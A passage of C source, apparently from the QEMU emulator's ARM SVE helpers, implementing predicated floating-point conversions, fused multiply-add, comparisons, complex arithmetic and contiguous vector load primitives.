float64_to_float16(f, true, fpst); set_flush_to_zero(save, fpst); return ret; } static inline int16_t vfp_float16_to_int16_rtz(float16 f, float_status *s) { if (float16_is_any_nan(f)) { float_raise(float_flag_invalid, s); return 0; } return float16_to_int16_round_to_zero(f, s); } static inline int64_t vfp_float16_to_int64_rtz(float16 f, float_status *s) { if (float16_is_any_nan(f)) { float_raise(float_flag_invalid, s); return 0; } return float16_to_int64_round_to_zero(f, s); } static inline int64_t vfp_float32_to_int64_rtz(float32 f, float_status *s) { if (float32_is_any_nan(f)) { float_raise(float_flag_invalid, s); return 0; } return float32_to_int64_round_to_zero(f, s); } static inline int64_t vfp_float64_to_int64_rtz(float64 f, float_status *s) { if (float64_is_any_nan(f)) { float_raise(float_flag_invalid, s); return 0; } return float64_to_int64_round_to_zero(f, s); } static inline uint16_t vfp_float16_to_uint16_rtz(float16 f, float_status *s) { if (float16_is_any_nan(f)) { float_raise(float_flag_invalid, s); return 0; } return float16_to_uint16_round_to_zero(f, s); } static inline uint64_t vfp_float16_to_uint64_rtz(float16 f, float_status *s) { if (float16_is_any_nan(f)) { float_raise(float_flag_invalid, s); return 0; } return float16_to_uint64_round_to_zero(f, s); } static inline uint64_t vfp_float32_to_uint64_rtz(float32 f, float_status *s) { if (float32_is_any_nan(f)) { float_raise(float_flag_invalid, s); return 0; } return float32_to_uint64_round_to_zero(f, s); } static inline uint64_t vfp_float64_to_uint64_rtz(float64 f, float_status *s) { if (float64_is_any_nan(f)) { float_raise(float_flag_invalid, s); return 0; } return float64_to_uint64_round_to_zero(f, s); } DO_ZPZ_FP(sve_fcvt_sh, uint32_t, H1_4, sve_f32_to_f16) DO_ZPZ_FP(sve_fcvt_hs, uint32_t, H1_4, sve_f16_to_f32) DO_ZPZ_FP(sve_fcvt_dh, uint64_t, , sve_f64_to_f16) DO_ZPZ_FP(sve_fcvt_hd, uint64_t, , sve_f16_to_f64) DO_ZPZ_FP(sve_fcvt_ds, uint64_t, , float64_to_float32) DO_ZPZ_FP(sve_fcvt_sd, uint64_t, , float32_to_float64) DO_ZPZ_FP(sve_fcvtzs_hh, uint16_t, H1_2, vfp_float16_to_int16_rtz) DO_ZPZ_FP(sve_fcvtzs_hs, uint32_t, H1_4, helper_vfp_tosizh) DO_ZPZ_FP(sve_fcvtzs_ss, uint32_t, H1_4, helper_vfp_tosizs) DO_ZPZ_FP(sve_fcvtzs_hd, uint64_t, , vfp_float16_to_int64_rtz) DO_ZPZ_FP(sve_fcvtzs_sd, uint64_t, , vfp_float32_to_int64_rtz) DO_ZPZ_FP(sve_fcvtzs_ds, uint64_t, , helper_vfp_tosizd) DO_ZPZ_FP(sve_fcvtzs_dd, uint64_t, , vfp_float64_to_int64_rtz) DO_ZPZ_FP(sve_fcvtzu_hh, uint16_t, H1_2, vfp_float16_to_uint16_rtz) DO_ZPZ_FP(sve_fcvtzu_hs, uint32_t, H1_4, helper_vfp_touizh) DO_ZPZ_FP(sve_fcvtzu_ss, uint32_t, H1_4, helper_vfp_touizs) DO_ZPZ_FP(sve_fcvtzu_hd, uint64_t, , vfp_float16_to_uint64_rtz) DO_ZPZ_FP(sve_fcvtzu_sd, uint64_t, , vfp_float32_to_uint64_rtz) DO_ZPZ_FP(sve_fcvtzu_ds, uint64_t, , helper_vfp_touizd) DO_ZPZ_FP(sve_fcvtzu_dd, uint64_t, , vfp_float64_to_uint64_rtz) DO_ZPZ_FP(sve_frint_h, uint16_t, H1_2, helper_advsimd_rinth) DO_ZPZ_FP(sve_frint_s, uint32_t, H1_4, helper_rints) DO_ZPZ_FP(sve_frint_d, uint64_t, , helper_rintd) DO_ZPZ_FP(sve_frintx_h, uint16_t, H1_2, float16_round_to_int) DO_ZPZ_FP(sve_frintx_s, uint32_t, H1_4, float32_round_to_int) DO_ZPZ_FP(sve_frintx_d, uint64_t, , float64_round_to_int) DO_ZPZ_FP(sve_frecpx_h, uint16_t, H1_2, helper_frecpx_f16) DO_ZPZ_FP(sve_frecpx_s, uint32_t, H1_4, helper_frecpx_f32) DO_ZPZ_FP(sve_frecpx_d, uint64_t, , helper_frecpx_f64) DO_ZPZ_FP(sve_fsqrt_h, uint16_t, H1_2, float16_sqrt) DO_ZPZ_FP(sve_fsqrt_s, uint32_t, H1_4, float32_sqrt) DO_ZPZ_FP(sve_fsqrt_d, uint64_t, , float64_sqrt) DO_ZPZ_FP(sve_scvt_hh, uint16_t, H1_2, int16_to_float16) DO_ZPZ_FP(sve_scvt_sh, uint32_t, H1_4, int32_to_float16) DO_ZPZ_FP(sve_scvt_ss, uint32_t, H1_4, int32_to_float32) DO_ZPZ_FP(sve_scvt_sd, uint64_t, , int32_to_float64) DO_ZPZ_FP(sve_scvt_dh, uint64_t, , int64_to_float16) DO_ZPZ_FP(sve_scvt_ds, uint64_t, , int64_to_float32) DO_ZPZ_FP(sve_scvt_dd, uint64_t, , int64_to_float64) DO_ZPZ_FP(sve_ucvt_hh, uint16_t, H1_2, uint16_to_float16) DO_ZPZ_FP(sve_ucvt_sh, uint32_t, H1_4, uint32_to_float16) DO_ZPZ_FP(sve_ucvt_ss, uint32_t, H1_4, uint32_to_float32) DO_ZPZ_FP(sve_ucvt_sd, uint64_t, , uint32_to_float64) DO_ZPZ_FP(sve_ucvt_dh, uint64_t, , uint64_to_float16) DO_ZPZ_FP(sve_ucvt_ds, uint64_t, , uint64_to_float32) DO_ZPZ_FP(sve_ucvt_dd, uint64_t, , uint64_to_float64) #undef DO_ZPZ_FP /* 4-operand predicated multiply-add. This requires 7 operands to pass * "properly", so we need to encode some of the registers into DESC. */ QEMU_BUILD_BUG_ON(SIMD_DATA_SHIFT + 20 > 32); static void do_fmla_zpzzz_h(CPUARMState *env, void *vg, uint32_t desc, uint16_t neg1, uint16_t neg3) { intptr_t i = simd_oprsz(desc); unsigned rd = extract32(desc, SIMD_DATA_SHIFT, 5); unsigned rn = extract32(desc, SIMD_DATA_SHIFT + 5, 5); unsigned rm = extract32(desc, SIMD_DATA_SHIFT + 10, 5); unsigned ra = extract32(desc, SIMD_DATA_SHIFT + 15, 5); void *vd = &env->vfp.zregs[rd]; void *vn = &env->vfp.zregs[rn]; void *vm = &env->vfp.zregs[rm]; void *va = &env->vfp.zregs[ra]; uint64_t *g = vg; do { uint64_t pg = g[(i - 1) >> 6]; do { i -= 2; if (likely((pg >> (i & 63)) & 1)) { float16 e1, e2, e3, r; e1 = *(uint16_t *)((char *)vn + H1_2(i)) ^ neg1; e2 = *(uint16_t *)((char *)vm + H1_2(i)); e3 = *(uint16_t *)((char *)va + H1_2(i)) ^ neg3; r = float16_muladd(e1, e2, e3, 0, &env->vfp.fp_status_f16); *(uint16_t *)((char *)vd + H1_2(i)) = r; } } while (i & 63); } while (i != 0); } void HELPER(sve_fmla_zpzzz_h)(CPUARMState *env, void *vg, uint32_t desc) { do_fmla_zpzzz_h(env, vg, desc, 0, 0); } void HELPER(sve_fmls_zpzzz_h)(CPUARMState *env, void *vg, uint32_t desc) { do_fmla_zpzzz_h(env, vg, desc, 0x8000, 0); } void HELPER(sve_fnmla_zpzzz_h)(CPUARMState *env, void *vg, uint32_t desc) { do_fmla_zpzzz_h(env, vg, desc, 0x8000, 0x8000); } void HELPER(sve_fnmls_zpzzz_h)(CPUARMState *env, void *vg, uint32_t desc) { do_fmla_zpzzz_h(env, vg, desc, 0, 0x8000); } static void do_fmla_zpzzz_s(CPUARMState *env, void *vg, uint32_t desc, uint32_t neg1, uint32_t neg3) { intptr_t i = simd_oprsz(desc); unsigned rd = extract32(desc, SIMD_DATA_SHIFT, 5); unsigned rn = extract32(desc, SIMD_DATA_SHIFT + 5, 5); unsigned rm = extract32(desc, SIMD_DATA_SHIFT + 10, 5); unsigned ra = extract32(desc, SIMD_DATA_SHIFT + 15, 5); void *vd = &env->vfp.zregs[rd]; void *vn = &env->vfp.zregs[rn]; void *vm = &env->vfp.zregs[rm]; void *va = &env->vfp.zregs[ra]; uint64_t *g = vg; do { uint64_t pg = g[(i - 1) >> 6]; do { i -= 4; if (likely((pg >> (i & 63)) & 1)) { float32 e1, e2, e3, r; e1 = *(uint32_t *)((char *)vn + H1_4(i)) ^ neg1; e2 = *(uint32_t *)((char *)vm + H1_4(i)); e3 = *(uint32_t *)((char *)va + H1_4(i)) ^ neg3; r = float32_muladd(e1, e2, e3, 0, &env->vfp.fp_status); *(uint32_t *)((char *)vd + H1_4(i)) = r; } } while (i & 63); } while (i != 0); } void HELPER(sve_fmla_zpzzz_s)(CPUARMState *env, void *vg, uint32_t desc) { do_fmla_zpzzz_s(env, vg, desc, 0, 0); } void HELPER(sve_fmls_zpzzz_s)(CPUARMState *env, void *vg, uint32_t desc) { do_fmla_zpzzz_s(env, vg, desc, 0x80000000, 0); } void HELPER(sve_fnmla_zpzzz_s)(CPUARMState *env, void *vg, uint32_t desc) { do_fmla_zpzzz_s(env, vg, desc, 0x80000000, 0x80000000); } void HELPER(sve_fnmls_zpzzz_s)(CPUARMState *env, void *vg, uint32_t desc) { do_fmla_zpzzz_s(env, vg, desc, 0, 0x80000000); } static void do_fmla_zpzzz_d(CPUARMState *env, void *vg, uint32_t desc, uint64_t neg1, uint64_t neg3) { intptr_t i = simd_oprsz(desc); unsigned rd = extract32(desc, SIMD_DATA_SHIFT, 5); unsigned rn = extract32(desc, SIMD_DATA_SHIFT + 5, 5); unsigned rm = extract32(desc, SIMD_DATA_SHIFT + 10, 5); unsigned ra = extract32(desc, SIMD_DATA_SHIFT + 15, 5); void *vd = &env->vfp.zregs[rd]; void *vn = &env->vfp.zregs[rn]; void *vm = &env->vfp.zregs[rm]; void *va = &env->vfp.zregs[ra]; uint64_t *g = vg; do { uint64_t pg = g[(i - 1) >> 6]; do { i -= 8; if (likely((pg >> (i & 63)) & 1)) { float64 e1, e2, e3, r; e1 = *(uint64_t *)((char *)vn + i) ^ neg1; e2 = *(uint64_t *)((char *)vm + i); e3 = *(uint64_t *)((char *)va + i) ^ neg3; r = float64_muladd(e1, e2, e3, 0, &env->vfp.fp_status); *(uint64_t *)((char *)vd + i) = r; } } while (i & 63); } while (i != 0); } void HELPER(sve_fmla_zpzzz_d)(CPUARMState *env, void *vg, uint32_t desc) { do_fmla_zpzzz_d(env, vg, desc, 0, 0); } void HELPER(sve_fmls_zpzzz_d)(CPUARMState *env, void *vg, uint32_t desc) { do_fmla_zpzzz_d(env, vg, desc, INT64_MIN, 0); } void HELPER(sve_fnmla_zpzzz_d)(CPUARMState *env, void *vg, uint32_t desc) { do_fmla_zpzzz_d(env, vg, desc, INT64_MIN, INT64_MIN); } void HELPER(sve_fnmls_zpzzz_d)(CPUARMState *env, void *vg, uint32_t desc) { do_fmla_zpzzz_d(env, vg, desc, 0, INT64_MIN); } /* Two operand floating-point comparison controlled by a predicate. * Unlike the integer version, we are not allowed to optimistically * compare operands, since the comparison may have side effects wrt * the FPSR. */ #define DO_FPCMP_PPZZ(NAME, TYPE, H, OP) \ void HELPER(NAME)(void *vd, void *vn, void *vm, void *vg, \ void *status, uint32_t desc) \ { \ intptr_t i = simd_oprsz(desc), j = (i - 1) >> 6; \ uint64_t *d = vd, *g = vg; \ do { \ uint64_t out = 0, pg = g[j]; \ do { \ i -= sizeof(TYPE), out <<= sizeof(TYPE); \ if (likely((pg >> (i & 63)) & 1)) { \ TYPE nn = *(TYPE *)((char *)vn + H(i)); \ TYPE mm = *(TYPE *)((char *)vm + H(i)); \ out |= OP(TYPE, nn, mm, status); \ } \ } while (i & 63); \ d[j--] = out; \ } while (i > 0); \ } #define DO_FPCMP_PPZZ_H(NAME, OP) \ DO_FPCMP_PPZZ(NAME##_h, float16, H1_2, OP) #define DO_FPCMP_PPZZ_S(NAME, OP) \ DO_FPCMP_PPZZ(NAME##_s, float32, H1_4, OP) #define DO_FPCMP_PPZZ_D(NAME, OP) \ DO_FPCMP_PPZZ(NAME##_d, float64, , OP) #define DO_FPCMP_PPZZ_ALL(NAME, OP) \ DO_FPCMP_PPZZ_H(NAME, OP) \ DO_FPCMP_PPZZ_S(NAME, OP) \ DO_FPCMP_PPZZ_D(NAME, OP) #define DO_FCMGE(TYPE, X, Y, ST) TYPE##_compare(Y, X, ST) <= 0 #define DO_FCMGT(TYPE, X, Y, ST) TYPE##_compare(Y, X, ST) < 0 #define DO_FCMLE(TYPE, X, Y, ST) TYPE##_compare(X, Y, ST) <= 0 #define DO_FCMLT(TYPE, X, Y, ST) TYPE##_compare(X, Y, ST) < 0 #define DO_FCMEQ(TYPE, X, Y, ST) TYPE##_compare_quiet(X, Y, ST) == 0 #define DO_FCMNE(TYPE, X, Y, ST) TYPE##_compare_quiet(X, Y, ST) != 0 #define DO_FCMUO(TYPE, X, Y, ST) \ TYPE##_compare_quiet(X, Y, ST) == float_relation_unordered #define DO_FACGE(TYPE, X, Y, ST) \ TYPE##_compare(TYPE##_abs(Y), TYPE##_abs(X), ST) <= 0 #define DO_FACGT(TYPE, X, Y, ST) \ TYPE##_compare(TYPE##_abs(Y), TYPE##_abs(X), ST) < 0 DO_FPCMP_PPZZ_ALL(sve_fcmge, DO_FCMGE) DO_FPCMP_PPZZ_ALL(sve_fcmgt, DO_FCMGT) DO_FPCMP_PPZZ_ALL(sve_fcmeq, DO_FCMEQ) DO_FPCMP_PPZZ_ALL(sve_fcmne, DO_FCMNE) DO_FPCMP_PPZZ_ALL(sve_fcmuo, DO_FCMUO) DO_FPCMP_PPZZ_ALL(sve_facge, DO_FACGE) DO_FPCMP_PPZZ_ALL(sve_facgt, DO_FACGT) #undef DO_FPCMP_PPZZ_ALL #undef DO_FPCMP_PPZZ_D #undef DO_FPCMP_PPZZ_S #undef DO_FPCMP_PPZZ_H #undef DO_FPCMP_PPZZ /* One operand floating-point comparison against zero, controlled * by a predicate. */ #define DO_FPCMP_PPZ0(NAME, TYPE, H, OP) \ void HELPER(NAME)(void *vd, void *vn, void *vg, \ void *status, uint32_t desc) \ { \ intptr_t i = simd_oprsz(desc), j = (i - 1) >> 6; \ uint64_t *d = vd, *g = vg; \ do { \ uint64_t out = 0, pg = g[j]; \ do { \ i -= sizeof(TYPE), out <<= sizeof(TYPE); \ if ((pg >> (i & 63)) & 1) { \ TYPE nn = *(TYPE *)((char *)vn + H(i)); \ out |= OP(TYPE, nn, 0, status); \ } \ } while (i & 63); \ d[j--] = out; \ } while (i > 0); \ } #define DO_FPCMP_PPZ0_H(NAME, OP) \ DO_FPCMP_PPZ0(NAME##_h, float16, H1_2, OP) #define DO_FPCMP_PPZ0_S(NAME, OP) \ DO_FPCMP_PPZ0(NAME##_s, float32, H1_4, OP) #define DO_FPCMP_PPZ0_D(NAME, OP) \ DO_FPCMP_PPZ0(NAME##_d, float64, , OP) #define DO_FPCMP_PPZ0_ALL(NAME, OP) \ DO_FPCMP_PPZ0_H(NAME, OP) \ DO_FPCMP_PPZ0_S(NAME, OP) \ DO_FPCMP_PPZ0_D(NAME, OP) DO_FPCMP_PPZ0_ALL(sve_fcmge0, DO_FCMGE) DO_FPCMP_PPZ0_ALL(sve_fcmgt0, DO_FCMGT) DO_FPCMP_PPZ0_ALL(sve_fcmle0, DO_FCMLE) DO_FPCMP_PPZ0_ALL(sve_fcmlt0, DO_FCMLT) DO_FPCMP_PPZ0_ALL(sve_fcmeq0, DO_FCMEQ) DO_FPCMP_PPZ0_ALL(sve_fcmne0, DO_FCMNE) /* FP Trig Multiply-Add. */ void HELPER(sve_ftmad_h)(void *vd, void *vn, void *vm, void *vs, uint32_t desc) { static const float16 coeff[16] = { 0x3c00, 0xb155, 0x2030, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x3c00, 0xb800, 0x293a, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, }; intptr_t i, opr_sz = simd_oprsz(desc) / sizeof(float16); intptr_t x = simd_data(desc); float16 *d = vd, *n = vn, *m = vm; for (i = 0; i < opr_sz; i++) { float16 mm = m[i]; intptr_t xx = x; if (float16_is_neg(mm)) { mm = float16_abs(mm); xx += 8; } d[i] = float16_muladd(n[i], mm, coeff[xx], 0, vs); } } void HELPER(sve_ftmad_s)(void *vd, void *vn, void *vm, void *vs, uint32_t desc) { static const float32 coeff[16] = { 0x3f800000, 0xbe2aaaab, 0x3c088886, 0xb95008b9, 0x36369d6d, 0x00000000, 0x00000000, 0x00000000, 0x3f800000, 0xbf000000, 0x3d2aaaa6, 0xbab60705, 0x37cd37cc, 0x00000000, 0x00000000, 0x00000000, }; intptr_t i, opr_sz = simd_oprsz(desc) / sizeof(float32); intptr_t x = simd_data(desc); float32 *d = vd, *n = vn, *m = vm; for (i = 0; i < opr_sz; i++) { float32 mm = m[i]; intptr_t xx = x; if (float32_is_neg(mm)) { mm = float32_abs(mm); xx += 8; } d[i] = float32_muladd(n[i], mm, coeff[xx], 0, vs); } } void HELPER(sve_ftmad_d)(void *vd, void *vn, void *vm, void *vs, uint32_t desc) { static const float64 coeff[16] = { 0x3ff0000000000000ull, 0xbfc5555555555543ull, 0x3f8111111110f30cull, 0xbf2a01a019b92fc6ull, 0x3ec71de351f3d22bull, 0xbe5ae5e2b60f7b91ull, 0x3de5d8408868552full, 0x0000000000000000ull, 0x3ff0000000000000ull, 0xbfe0000000000000ull, 0x3fa5555555555536ull, 0xbf56c16c16c13a0bull, 0x3efa01a019b1e8d8ull, 0xbe927e4f7282f468ull, 0x3e21ee96d2641b13ull, 0xbda8f76380fbb401ull, }; intptr_t i, opr_sz = simd_oprsz(desc) / sizeof(float64); intptr_t x = simd_data(desc); float64 *d = vd, *n = vn, *m = vm; for (i = 0; i < opr_sz; i++) { float64 mm = m[i]; intptr_t xx = x; if (float64_is_neg(mm)) { mm = float64_abs(mm); xx += 8; } d[i] = float64_muladd(n[i], mm, coeff[xx], 0, vs); } } /* * FP Complex Add */ void HELPER(sve_fcadd_h)(void *vd, void *vn, void *vm, void *vg, void *vs, uint32_t desc) { intptr_t j, i = simd_oprsz(desc); uint64_t *g = vg; float16 neg_imag = float16_set_sign(0, simd_data(desc)); float16 neg_real = float16_chs(neg_imag); do { uint64_t pg = g[(i - 1) >> 6]; do { float16 e0, e1, e2, e3; /* I holds the real index; J holds the imag index. */ j = i - sizeof(float16); i -= 2 * sizeof(float16); e0 = *(float16 *)((char *)vn + H1_2(i)); e1 = *(float16 *)((char *)vm + H1_2(j)) ^ neg_real; e2 = *(float16 *)((char *)vn + H1_2(j)); e3 = *(float16 *)((char *)vm + H1_2(i)) ^ neg_imag; if (likely((pg >> (i & 63)) & 1)) { *(float16 *)((char *)vd + H1_2(i)) = float16_add(e0, e1, vs); } if (likely((pg >> (j & 63)) & 1)) { *(float16 *)((char *)vd + H1_2(j)) = float16_add(e2, e3, vs); } } while (i & 63); } while (i != 0); } void HELPER(sve_fcadd_s)(void *vd, void *vn, void *vm, void *vg, void *vs, uint32_t desc) { intptr_t j, i = simd_oprsz(desc); uint64_t *g = vg; float32 neg_imag = float32_set_sign(0, simd_data(desc)); float32 neg_real = float32_chs(neg_imag); do { uint64_t pg = g[(i - 1) >> 6]; do { float32 e0, e1, e2, e3; /* I holds the real index; J holds the imag index. */ j = i - sizeof(float32); i -= 2 * sizeof(float32); e0 = *(float32 *)((char *)vn + H1_2(i)); e1 = *(float32 *)((char *)vm + H1_2(j)) ^ neg_real; e2 = *(float32 *)((char *)vn + H1_2(j)); e3 = *(float32 *)((char *)vm + H1_2(i)) ^ neg_imag; if (likely((pg >> (i & 63)) & 1)) { *(float32 *)((char *)vd + H1_2(i)) = float32_add(e0, e1, vs); } if (likely((pg >> (j & 63)) & 1)) { *(float32 *)((char *)vd + H1_2(j)) = float32_add(e2, e3, vs); } } while (i & 63); } while (i != 0); } void HELPER(sve_fcadd_d)(void *vd, void *vn, void *vm, void *vg, void *vs, uint32_t desc) { intptr_t j, i = simd_oprsz(desc); uint64_t *g = vg; float64 neg_imag = float64_set_sign(0, simd_data(desc)); float64 neg_real = float64_chs(neg_imag); do { uint64_t pg = g[(i - 1) >> 6]; do { float64 e0, e1, e2, e3; /* I holds the real index; J holds the imag index. */ j = i - sizeof(float64); i -= 2 * sizeof(float64); e0 = *(float64 *)((char *)vn + H1_2(i)); e1 = *(float64 *)((char *)vm + H1_2(j)) ^ neg_real; e2 = *(float64 *)((char *)vn + H1_2(j)); e3 = *(float64 *)((char *)vm + H1_2(i)) ^ neg_imag; if (likely((pg >> (i & 63)) & 1)) { *(float64 *)((char *)vd + H1_2(i)) = float64_add(e0, e1, vs); } if (likely((pg >> (j & 63)) & 1)) { *(float64 *)((char *)vd + H1_2(j)) = float64_add(e2, e3, vs); } } while (i & 63); } while (i != 0); } /* * FP Complex Multiply */ QEMU_BUILD_BUG_ON(SIMD_DATA_SHIFT + 22 > 32); void HELPER(sve_fcmla_zpzzz_h)(CPUARMState *env, void *vg, uint32_t desc) { intptr_t j, i = simd_oprsz(desc); unsigned rd = extract32(desc, SIMD_DATA_SHIFT, 5); unsigned rn = extract32(desc, SIMD_DATA_SHIFT + 5, 5); unsigned rm = extract32(desc, SIMD_DATA_SHIFT + 10, 5); unsigned ra = extract32(desc, SIMD_DATA_SHIFT + 15, 5); unsigned rot = extract32(desc, SIMD_DATA_SHIFT + 20, 2); bool flip = rot & 1; float16 neg_imag, neg_real; void *vd = &env->vfp.zregs[rd]; void *vn = &env->vfp.zregs[rn]; void *vm = &env->vfp.zregs[rm]; void *va = &env->vfp.zregs[ra]; uint64_t *g = vg; neg_imag = float16_set_sign(0, (rot & 2) != 0); neg_real = float16_set_sign(0, rot == 1 || rot == 2); do { uint64_t pg = g[(i - 1) >> 6]; do { float16 e1, e2, e3, e4, nr, ni, mr, mi, d; /* I holds the real index; J holds the imag index. */ j = i - sizeof(float16); i -= 2 * sizeof(float16); nr = *(float16 *)((char *)vn + H1_2(i)); ni = *(float16 *)((char *)vn + H1_2(j)); mr = *(float16 *)((char *)vm + H1_2(i)); mi = *(float16 *)((char *)vm + H1_2(j)); e2 = (flip ? ni : nr); e1 = (flip ? mi : mr) ^ neg_real; e4 = e2; e3 = (flip ? mr : mi) ^ neg_imag; if (likely((pg >> (i & 63)) & 1)) { d = *(float16 *)((char *)va + H1_2(i)); d = float16_muladd(e2, e1, d, 0, &env->vfp.fp_status_f16); *(float16 *)((char *)vd + H1_2(i)) = d; } if (likely((pg >> (j & 63)) & 1)) { d = *(float16 *)((char *)va + H1_2(j)); d = float16_muladd(e4, e3, d, 0, &env->vfp.fp_status_f16); *(float16 *)((char *)vd + H1_2(j)) = d; } } while (i & 63); } while (i != 0); } void HELPER(sve_fcmla_zpzzz_s)(CPUARMState *env, void *vg, uint32_t desc) { intptr_t j, i = simd_oprsz(desc); unsigned rd = extract32(desc, SIMD_DATA_SHIFT, 5); unsigned rn = extract32(desc, SIMD_DATA_SHIFT + 5, 5); unsigned rm = extract32(desc, SIMD_DATA_SHIFT + 10, 5); unsigned ra = extract32(desc, SIMD_DATA_SHIFT + 15, 5); unsigned rot = extract32(desc, SIMD_DATA_SHIFT + 20, 2); bool flip = rot & 1; float32 neg_imag, neg_real; void *vd = &env->vfp.zregs[rd]; void *vn = &env->vfp.zregs[rn]; void *vm = &env->vfp.zregs[rm]; void *va = &env->vfp.zregs[ra]; uint64_t *g = vg; neg_imag = float32_set_sign(0, (rot & 2) != 0); neg_real = float32_set_sign(0, rot == 1 || rot == 2); do { uint64_t pg = g[(i - 1) >> 6]; do { float32 e1, e2, e3, e4, nr, ni, mr, mi, d; /* I holds the real index; J holds the imag index. */ j = i - sizeof(float32); i -= 2 * sizeof(float32); nr = *(float32 *)((char *)vn + H1_2(i)); ni = *(float32 *)((char *)vn + H1_2(j)); mr = *(float32 *)((char *)vm + H1_2(i)); mi = *(float32 *)((char *)vm + H1_2(j)); e2 = (flip ? ni : nr); e1 = (flip ? mi : mr) ^ neg_real; e4 = e2; e3 = (flip ? mr : mi) ^ neg_imag; if (likely((pg >> (i & 63)) & 1)) { d = *(float32 *)((char *)va + H1_2(i)); d = float32_muladd(e2, e1, d, 0, &env->vfp.fp_status); *(float32 *)((char *)vd + H1_2(i)) = d; } if (likely((pg >> (j & 63)) & 1)) { d = *(float32 *)((char *)va + H1_2(j)); d = float32_muladd(e4, e3, d, 0, &env->vfp.fp_status); *(float32 *)((char *)vd + H1_2(j)) = d; } } while (i & 63); } while (i != 0); } void HELPER(sve_fcmla_zpzzz_d)(CPUARMState *env, void *vg, uint32_t desc) { intptr_t j, i = simd_oprsz(desc); unsigned rd = extract32(desc, SIMD_DATA_SHIFT, 5); unsigned rn = extract32(desc, SIMD_DATA_SHIFT + 5, 5); unsigned rm = extract32(desc, SIMD_DATA_SHIFT + 10, 5); unsigned ra = extract32(desc, SIMD_DATA_SHIFT + 15, 5); unsigned rot = extract32(desc, SIMD_DATA_SHIFT + 20, 2); bool flip = rot & 1; float64 neg_imag, neg_real; void *vd = &env->vfp.zregs[rd]; void *vn = &env->vfp.zregs[rn]; void *vm = &env->vfp.zregs[rm]; void *va = &env->vfp.zregs[ra]; uint64_t *g = vg; neg_imag = float64_set_sign(0, (rot & 2) != 0); neg_real = float64_set_sign(0, rot == 1 || rot == 2); do { uint64_t pg = g[(i - 1) >> 6]; do { float64 e1, e2, e3, e4, nr, ni, mr, mi, d; /* I holds the real index; J holds the imag index. */ j = i - sizeof(float64); i -= 2 * sizeof(float64); nr = *(float64 *)((char *)vn + H1_2(i)); ni = *(float64 *)((char *)vn + H1_2(j)); mr = *(float64 *)((char *)vm + H1_2(i)); mi = *(float64 *)((char *)vm + H1_2(j)); e2 = (flip ? ni : nr); e1 = (flip ? mi : mr) ^ neg_real; e4 = e2; e3 = (flip ? mr : mi) ^ neg_imag; if (likely((pg >> (i & 63)) & 1)) { d = *(float64 *)((char *)va + H1_2(i)); d = float64_muladd(e2, e1, d, 0, &env->vfp.fp_status); *(float64 *)((char *)vd + H1_2(i)) = d; } if (likely((pg >> (j & 63)) & 1)) { d = *(float64 *)((char *)va + H1_2(j)); d = float64_muladd(e4, e3, d, 0, &env->vfp.fp_status); *(float64 *)((char *)vd + H1_2(j)) = d; } } while (i & 63); } while (i != 0); } /* * Load contiguous data, protected by a governing predicate. */ /* * Load elements into @vd, controlled by @vg, from @host + @mem_ofs. * Memory is valid through @host + @mem_max. The register element * indicies are inferred from @mem_ofs, as modified by the types for * which the helper is built. Return the @mem_ofs of the first element * not loaded (which is @mem_max if they are all loaded). * * For softmmu, we have fully validated the guest page. For user-only, * we cannot fully validate without taking the mmap lock, but since we * know the access is within one host page, if any access is valid they * all must be valid. However, when @vg is all false, it may be that * no access is valid. */ typedef intptr_t sve_ld1_host_fn(void *vd, void *vg, void *host, intptr_t mem_ofs, intptr_t mem_max); /* * Load one element into @vd + @reg_off from (@env, @vaddr, @ra). * The controlling predicate is known to be true. */ typedef void sve_ld1_tlb_fn(CPUARMState *env, void *vd, intptr_t reg_off, target_ulong vaddr, TCGMemOpIdx oi, uintptr_t ra); typedef sve_ld1_tlb_fn sve_st1_tlb_fn; /* * Generate the above primitives. */ #define DO_LD_HOST(NAME, H, TYPEE, TYPEM, HOST) \ static intptr_t sve_##NAME##_host(void *vd, void *vg, void *host, \ intptr_t mem_off, const intptr_t mem_max) \ { \ intptr_t reg_off = mem_off * (sizeof(TYPEE) / sizeof(TYPEM)); \ uint64_t *pg = vg; \ while (mem_off + sizeof(TYPEM) <= mem_max) { \ TYPEM val = 0; \ if (likely((pg[reg_off >> 6] >> (reg_off & 63)) & 1)) { \ val = HOST((char *)host + mem_off); \ } \ *(TYPEE *)((char *)vd + H(reg_off)) = val; \ mem_off += sizeof(TYPEM), reg_off += sizeof(TYPEE); \ } \ return mem_off; \ } #define DO_LD_TLB(NAME, H, TYPEE, TYPEM, HOST, MOEND, TLB) \ static void sve_##NAME##_tlb(CPUARMState *env, void *vd, intptr_t reg_off, \ target_ulong addr, TCGMemOpIdx oi, uintptr_t ra) \ { \ TYPEM val = TLB(env, addr, oi, ra); \ *(TYPEE *)((char *)vd + H(reg_off)) = val; \ } #define DO_LD_PRIM_1(NAME, H, TE, TM) \ DO_LD_HOST(NAME, H, TE, TM, ldub_p) \ DO_LD_TLB(NAME, H, TE, TM, ldub_p, 0, helper_ret_ldub_mmu) DO_LD_PRIM_1(ld1bb, H1, uint8_t, uint8_t) DO_LD_PRIM_1(ld1bhu, H1_2, uint16_t, uint8_t) DO_LD_PRIM_1(ld1bhs, H1_2, uint16_t, int8_t) DO_LD_PRIM_1(ld1bsu, H1_4, uint32_t, uint8_t) DO_LD_PRIM_1(ld1bss, H1_4, uint32_t, int8_t) DO_LD_PRIM_1(ld1bdu, , uint64_t, uint8_t) DO_LD_PRIM_1(ld1bds, , uint64_t, int8_t) #define DO_LD_PRIM_2(NAME, end, MOEND, H, TE, TM, PH, PT) \ DO_LD_HOST(NAME##_##end, H, TE, TM, PH##_##end##_p) \ DO_LD_TLB(NAME##_##end, H, TE, TM, PH##_##end##_p, \ MOEND, helper_##end##_##PT##_mmu) DO_LD_PRIM_2(ld1hh, le, MO_LE, H1_2, uint16_t, uint16_t, lduw, lduw) DO_LD_PRIM_2(ld1hsu, le, MO_LE, H1_4, uint32_t, uint16_t, lduw, lduw) DO_LD_PRIM_2(ld1hss, le, MO_LE, H1_4, uint32_t, int16_t, lduw, lduw) DO_LD_PRIM_2(ld1hdu, le, MO_LE, , uint64_t, uint16_t, lduw, lduw) DO_LD_PRIM_2(ld1hds, le, MO_LE, , uint64_t, int16_t, lduw, lduw) DO_LD_PRIM_2(ld1ss, le, MO_LE, H1_4, uint32_t, uint32_t, ldl, ldul) DO_LD_PRIM_2(ld1sdu, le, MO_LE, , uint64_t, uint32_t, ldl, ldul) DO_LD_PRIM_2(ld1sds, le, MO_LE, , uint64_t, int32_t, ldl, ldul) 